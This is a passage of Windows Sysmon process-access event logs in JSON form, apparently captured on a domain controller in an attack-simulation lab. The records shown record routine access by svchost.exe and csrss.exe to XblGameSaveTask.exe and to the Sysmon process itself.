08:03:08.570","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","SourceProcessId":"1140","SourceThreadId":"1976","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21BC-5F25-0000-00108DB10900}","TargetProcessId":"3900","TargetImage":"C:\\Windows\\System32\\XblGameSaveTask.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\UBPM.dll+a711|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e12a|c:\\windows\\system32\\UBPM.dll+dd82|c:\\windows\\system32\\EventAggregation.dll+3e22|c:\\windows\\system32\\EventAggregation.dll+36c9|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a073|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6413,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.570\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21BC-5F25-0000-00108DB10900}\r\nTargetProcessId: 3900\r\nTargetImage: C:\\Windows\\System32\\XblGameSaveTask.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.570","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21BC-5F25-0000-00108DB10900}","TargetProcessId":"3900","TargetImage":"C:\\Windows\\System32\\XblGameSaveTask.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6414,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.570\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.570","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6415,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.570\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.570","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6416,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.570\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.570","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6417,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.570\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.570","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6418,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.570\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.570","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6419,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.570\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.570","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6420,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.570\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.570","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
